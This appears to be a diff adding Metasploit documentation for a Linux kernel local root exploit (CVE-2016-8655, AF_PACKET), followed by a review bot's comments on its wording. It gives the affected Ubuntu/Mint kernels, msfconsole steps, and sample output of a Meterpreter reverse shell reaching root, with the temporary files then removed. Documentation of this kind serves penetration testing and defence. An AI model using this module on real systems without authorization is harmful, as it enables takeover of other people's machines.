| 1 | +## Description |
| 2 | + |
| 3 | + This module exploits a race condition and use-after-free in the |
| 4 | + `packet_set_ring` function in `net/packet/af_packet.c` (`AF_PACKET`) in |
| 5 | + the Linux kernel to execute code as `root` (CVE-2016-8655). |
| 6 | + |
| 7 | + The bug was initially introduced in 2011 and patched in 2016 in version |
| 8 | + 4.4.0-53.74, potentially affecting a large number of kernels; however |
| 9 | + this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels |
| 10 | + 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as |
| 11 | + Linux Mint. |
| 12 | + |
| 13 | + The target system must have unprivileged user namespaces enabled and |
| 14 | + two or more CPU cores. |
| 15 | + |
| 16 | + Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation |
| 17 | + may crash the kernel. |
| 18 | + |
| 19 | + |
| 20 | +## Vulnerable Application |
| 21 | + |
| 22 | + This module has been tested successfully on: |
| 23 | + |
| 24 | + * Linux Mint 17.3 (x86_64) |
| 25 | + * Linux Mint 18 (x86_64) |
| 26 | + * Ubuntu 16.04.2 (x86_64) |
| 27 | + |
| 28 | + With kernel versions: |
| 29 | + |
| 30 | + * 4.4.0-45-generic |
| 31 | + * 4.4.0-51-generic |
| 32 | + |
| 33 | + |
| 34 | +## Verification Steps |
| 35 | + |
| 36 | + 1. Start `msfconsole` |
| 37 | + 2. Get a session |
| 38 | + 3. `use exploit/linux/local/af_packet_chocobo_root_priv_esc` |
| 39 | + 4. `set SESSION [SESSION]` |
| 40 | + 5. `check` |
| 41 | + 6. `run` |
| 42 | + 7. You should get a new *root* session |
| 43 | + |
| 44 | + |
| 45 | +## Options |
| 46 | + |
| 47 | + **SESSION** |
| 48 | + |
| 49 | + Which session to use, which can be viewed with `sessions` |
| 50 | + |
| 51 | + **WritableDir** |
| 52 | + |
| 53 | + A writable directory file system path. (default: `/tmp`) |
| 54 | + |
| 55 | + **TIMEOUT** |
| 56 | + |
| 57 | + Race timeout (seconds). (default: `600`) |
| 58 | + |
| 59 | + **COMPILE** |
| 60 | + |
| 61 | + Options: `Auto` `True` `False` (default: `Auto`) |
| 62 | + |
| 63 | + Whether the exploit should be live compiled with `gcc` on the target system, |
| 64 | + or uploaded as a pre-compiled binary. |
| 65 | + |
| 66 | + `Auto` will first determine if `gcc` is installed to compile live on the system, |
| 67 | + and fall back to uploading a pre-compiled binary. |
| 68 | + |
| 69 | + |
| 70 | +## Scenarios |
| 71 | + |
| 72 | + ``` |
| 73 | + [*] Started reverse TCP handler on 172.16.191.188:4444 |
| 74 | + [*] Writing '/tmp/.iDLrwN3S4.c' (24885 bytes) ... |
| 75 | + [*] Writing '/tmp/.rMIvkKT' (207 bytes) ... |
| 76 | + [*] Launching exploit (Timeout: 600)... |
| 77 | + [*] Sending stage (853256 bytes) to 172.16.191.209 |
| 78 | + [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.209:38530) at 2018-05-07 03:07:21 -0400 |
| 79 | + [+] Deleted /tmp/.iDLrwN3S4.c |
| 80 | + [+] Deleted /tmp/.iDLrwN3S4 |
| 81 | + [+] Deleted /tmp/.rMIvkKT |
| 82 | +
|
| 83 | + meterpreter > getuid |
| 84 | + Server username: uid=0, gid=0, euid=0, egid=0 |
| 85 | + meterpreter > sysinfo |
| 86 | + Computer : 172.16.191.209 |
| 87 | + OS : Ubuntu 16.04 (Linux 4.4.0-51-generic) |
| 88 | + Architecture : x64 |
| 89 | + BuildTuple : i486-linux-musl |
| 90 | + Meterpreter : x86/linux |
| 91 | + meterpreter > |
| 92 | + ``` |
| 93 | + |
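Review bot: the Description paragraph conflates the upstream kernel fix with an Ubuntu package version: "patched in 2016 in version 4.4.0-53.74" reads as though 4.4.0-53.74 were an upstream kernel release, while the next sentence uses the same numbering for Ubuntu Trusty/Xenial kernel packages. State explicitly that 4.4.0-53.74 is the Ubuntu package that carries the fix, and rewrite the range "4.4.0 < 4.4.0-53" as "4.4.0 packages earlier than 4.4.0-53", since the current form reads as a comparison between two different version schemes. The Verification Steps also leave `check` undocumented: say which preconditions it tests (the kernel package version, unprivileged user namespaces, and the two-or-more-CPU requirement from the Description) and that a failed check should stop the run, given the Description's warning that failed exploitation may crash the kernel. Minor: in Options, "A writable directory file system path" is awkward; "Path to a writable directory on the target file system" is clearer.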